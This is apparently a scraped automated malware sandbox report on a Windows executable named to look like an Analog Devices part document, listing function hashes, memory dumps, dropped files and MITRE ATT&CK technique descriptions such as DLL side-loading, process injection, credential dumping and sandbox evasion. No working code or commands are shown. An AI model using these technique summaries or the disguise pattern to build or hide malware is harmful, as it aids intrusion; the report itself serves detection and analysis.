Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b85443cae9f03acbf617541633cd2a411c42d28300c010d975262920bce0921
Instruction ID: b034f276ac6478f6bc7b4cde0a62562ca2896012ccc50fda136d143a586ffd84
Opcode Fuzzy Hash: 3b85443cae9f03acbf617541633cd2a411c42d28300c010d975262920bce0921
Instruction Fuzzy Hash: FB31F9B5A01618AFDB14DF99DC81EEFB7F9EF88300F108209F919A7240D770A911CBA5

Function 0302809B Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd0b65a7f510db19dc4d849fa6814204b1461674a59fd63bf9738e821504db5
Instruction ID: 9b9fdf9a00ae932ae72cabc2d8d0964c30b8179c240b72e82404f7caded3db62
Opcode Fuzzy Hash: edd0b65a7f510db19dc4d849fa6814204b1461674a59fd63bf9738e821504db5
Instruction Fuzzy Hash: EF212CB5A01618AFDB14DF98DC81FEFBBB8EF89300F108509F909A7240D770A911CBA5

Function 03016B0B Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5615c2fc81a06f5a194a5ef3af13cd4fa91a9acd64803dadd7f2639ec567e1a8
Instruction ID: caa7c9f7dee06f0e8cdea7c4523f134c6e74bb657eabf9dc548fbd81b4923fd3
Opcode Fuzzy Hash: 5615c2fc81a06f5a194a5ef3af13cd4fa91a9acd64803dadd7f2639ec567e1a8
Instruction Fuzzy Hash: 721121B63813197AF720EA599C82FAB775C9BC4F60F244015FF08AE1C1DAA5B81147B8

Function 030273DB Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735d408d10580379114deab3875a93833b3c1af723f59bb76bbe2303e14ee0b8
Instruction ID: ba4fe4337c8d44974c16059b338611981e6e3cccbdc8cf33d18b4a776ab1958c
Opcode Fuzzy Hash: 735d408d10580379114deab3875a93833b3c1af723f59bb76bbe2303e14ee0b8
Instruction Fuzzy Hash: 1B114C75601714ABD710EFA88C81FEFB7A8EBC4710F104509FA196B280D77169118BA5

Function 03023FFB Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5180dcc2c3c6bcb3a0057ab49d71e21abab85306e9b2dc90952f3c1f17a01b0
Instruction ID: 22e54b959889bb35160e3b73b3b5d11e26770ff0d3e520cd9e7184378a9f96a5
Opcode Fuzzy Hash: a5180dcc2c3c6bcb3a0057ab49d71e21abab85306e9b2dc90952f3c1f17a01b0
Instruction Fuzzy Hash: 5721F1B6D01218AFDB00DFA9D9419EFBBF9EF88200F54455AE919E7244E7705A05CBE0

Function 0302755B Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f0a3b5c0e23003e7a220e29fbde9af8641a31e7a228cbd4a25a7e68ab0a6e3
Instruction ID: 9d6702c9e4c9bafc9c11d10f2833733e12f2f3582937f4d455d210c4f6113b5c
Opcode Fuzzy Hash: 08f0a3b5c0e23003e7a220e29fbde9af8641a31e7a228cbd4a25a7e68ab0a6e3
Instruction Fuzzy Hash: 4C115E75501718ABE710EBA88C41FEFBBA8EFC5700F00444DF9096B281D77169118BA5

Function 0302533B Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8ab26bc6ee243fa62ad7714ec6c4c6d060cf870a105f8d2b8512ca1b68e9ac
Instruction ID: 1a6716f670ce4d5548488058c7fdda9639f549ced954acf0b7629666c4444026
Opcode Fuzzy Hash: 6e8ab26bc6ee243fa62ad7714ec6c4c6d060cf870a105f8d2b8512ca1b68e9ac
Instruction Fuzzy Hash: 0B110AB6D0121DAFDB00DFA9D8409EEBBF9EB88200F14416AE909E7240E7715A108BA4

Function 030202DB Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100609d84c3cc0dcb38ccbf425eba21b3b05005dda666d054375756b5c8cf0bc
Instruction ID: 967c052730f9920eb97fcd516bb2be41aa5d10b4d2beebf2086cce3de49c5506
Opcode Fuzzy Hash: 100609d84c3cc0dcb38ccbf425eba21b3b05005dda666d054375756b5c8cf0bc
Instruction Fuzzy Hash: 6E0196BAA023246BD710EA64DC85EEF776CDF84610F004295FE18DB241FE70AE5147E1

Function 03002A16 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e39c2fc4df4c325a43142ebffd758c2cd5d888c439246b35e975dfd6fb54fc
Instruction ID: e41fb347fa37fd70ffda57152bc40636bfb9c3ebc1d1fdd5cf564668e27f8362
Opcode Fuzzy Hash: b4e39c2fc4df4c325a43142ebffd758c2cd5d888c439246b35e975dfd6fb54fc
Instruction Fuzzy Hash: 2311D7B1C21229AF8B50DFADD8845DEBFF8FB09620F10866BE818E7200D77186018FD4

Function 0302840B Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee2d913d648a4be5a6485806b4c37b1ac519ceaf5dfbeaaced7e6c302c7d7cc
Instruction ID: cbfa143af8d0cfce8ed2fe368fbfaf8c558f92043ae2a6d92726b986d91d9bd1
Opcode Fuzzy Hash: aee2d913d648a4be5a6485806b4c37b1ac519ceaf5dfbeaaced7e6c302c7d7cc
Instruction Fuzzy Hash: 8D018CB6205608BBCB44DE99DC91EEB77EDEF8D754F008209BA09A7240D634E9518BA4

Function 03023F6B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ad6a1f66cd3fbf3ef17e0e36e75a874ee2ae63c052ffb513c2cdc222ea096c
Instruction ID: 184e5086f1aefe7be528ce14050196bacce79d189dcabac9be6f0ac9b26634e3
Opcode Fuzzy Hash: e7ad6a1f66cd3fbf3ef17e0e36e75a874ee2ae63c052ffb513c2cdc222ea096c
Instruction Fuzzy Hash: 1401D7B6C1221CAF9B44DFE8D840AEEBBF9EB48200F14456AE905F7240E7705A048FA5

Function 03002B6B Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff94e3a966b2b7938522b20da3dcad2b6c3b87fa8e46296a884c0de0eb799d9
Instruction ID: 097b4c258072cf1fd0854d0d5a657cc77dca3aedc73615bc3949813f796046c4
Opcode Fuzzy Hash: 5ff94e3a966b2b7938522b20da3dcad2b6c3b87fa8e46296a884c0de0eb799d9
Instruction Fuzzy Hash: 9BF0A7736152166BE7109E5DEC84BD6F7DCEB84334F240622FD1C8B281E672E45187A0

Function 0302765B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578175f65c852e992ddac14ba16c81b0c6f5dc1bb2d5a0c5637a0ef0841c8a1c
Instruction ID: 129f829d59f3a7c30a5f257e19a4b008cfd81b5037d473aec767f0ae3cfc4bec
Opcode Fuzzy Hash: 578175f65c852e992ddac14ba16c81b0c6f5dc1bb2d5a0c5637a0ef0841c8a1c
Instruction Fuzzy Hash: 48F01C792006097FD710EF99DC85EDB77ACEFC9710F004519FA189B241D670B9118BB4

Function 0302832B Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 835bb84a35d5a57dde076292a237c20f3e9fca4f4d7fe386b77625b82f773868
Instruction ID: 344bf47d5dad2ba4b3aee04b42479d624f70065a490a3eac06e7c284033b4278
Opcode Fuzzy Hash: 835bb84a35d5a57dde076292a237c20f3e9fca4f4d7fe386b77625b82f773868
Instruction Fuzzy Hash: 1EE0C2B6200614BBD614EA99DC85EDB77ACEFC9710F004859FA09AB241DB70B9258BB4

Function 03016C2B Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
Instruction ID: 403bbbe4edea7dd70739441736c1b7e12141859aac3677cfdb75820d17d3441b
Opcode Fuzzy Hash: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
Instruction Fuzzy Hash: 38F0827180520CEBDB14CFA8D841BEDBBB8EB04320F1083A9E8299B280D63597518B81

Function 0302A1BB Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1d08c9a35134766a6311d5e0925356ea1aa016284bbae9a343ef6987c3169de
Instruction ID: 1dd7047933965a530bf22d16c63a04d664ed47fd9b656fca385859575a5d8834
Opcode Fuzzy Hash: b1d08c9a35134766a6311d5e0925356ea1aa016284bbae9a343ef6987c3169de
Instruction Fuzzy Hash: FFE04F3670272437C620A59D9C05FEBBB9C8BC5A70F090064FF089B340EE74A94543E4

Function 0302800B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f1baa746df9b82b654d29dc8ba6b1483ec87423ca04752226e27f52a4c1a50
Instruction ID: e51346694e9ea6be9ba26e00832bcf536c056513b84a2c8bd8c6417ad271a823
Opcode Fuzzy Hash: b2f1baa746df9b82b654d29dc8ba6b1483ec87423ca04752226e27f52a4c1a50
Instruction Fuzzy Hash: 9EE0463A2007147BD220EA99CC40FDB77ACEFC6720F004419FA09AB281C770BA1587A1

Function 03016C28 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d052e369143bcf7b744d020c47205a4f891d094e637d1a9cc6c285836056b280
Instruction ID: afa11e7204094b9b7cf923fb9a57e3b3e2011c1780dffa1fb8f28426c2effcf5
Opcode Fuzzy Hash: d052e369143bcf7b744d020c47205a4f891d094e637d1a9cc6c285836056b280
Instruction Fuzzy Hash: 19E0927191610CEADB08CFA8E951BEDBBA8DB04310F1083AEEC19DB280D63597A48740

Non-executed Functions

Function 03018B19 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 03018B85, 03018B88
FALSETRUE, xrefs: 03018BC3, 03018BC6
FALSETRUE, xrefs: 03018B9B, 03018BA0
TRUE, xrefs: 03018C18

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 3684dc3674bee606d7db6969de2a7b48057501879cb6cb35bc299f42e83f044a
Instruction ID: 87756f43b371268b31445178805ec0d0b20cb341c281643a61f71fdac45b0492
Opcode Fuzzy Hash: 3684dc3674bee606d7db6969de2a7b48057501879cb6cb35bc299f42e83f044a
Instruction Fuzzy Hash: EE3130B56126287EEB11EFA4CC45FEF7B7CAFD5600F004048FB04AA180DF74A65687A6

Function 03018B1B Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 03018B85, 03018B88
FALSETRUE, xrefs: 03018BC3, 03018BC6
FALSETRUE, xrefs: 03018B9B, 03018BA0
TRUE, xrefs: 03018C18

Memory Dump Source

Source File: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e90000_cvSKtqilyhlQ.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 119f7df8578b24c75091844eaed95f88fe1fbbee74e784721d3af797eedb7333
Instruction ID: 9697528ca6798193151a6b557b3695e2690e6410c194ddd3e13b8d0179eda300
Opcode Fuzzy Hash: 119f7df8578b24c75091844eaed95f88fe1fbbee74e784721d3af797eedb7333
Instruction Fuzzy Hash: CD413EB56126287EEB11EBA4CC45FFF7B7CAFC5600F004448FB04AA180DF74A65687A6

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.log

C:\Users\user\AppData\Local\Temp\6p1225E

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Function 07B56984 Relevance: 8.1, Strings: 6, Instructions: 625
COMMON

Function 0B240AD0 Relevance: 4.0, Strings: 3, Instructions: 253
COMMON

Function 013312A0 Relevance: 2.8, Strings: 2, Instructions: 258
COMMON

Function 01331330 Relevance: 2.7, Strings: 2, Instructions: 207
COMMON

Function 0B24E8BD Relevance: 11.4, Strings: 9, Instructions: 112
COMMON

Function 0B24E775 Relevance: 8.8, Strings: 7, Instructions: 84
COMMON

Function 051F8E98 Relevance: 4.1, Strings: 3, Instructions: 307
COMMON

Function 051FE9C0 Relevance: 2.7, Strings: 2, Instructions: 215
COMMON

Function 051FCFF7 Relevance: 2.7, Strings: 2, Instructions: 206
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre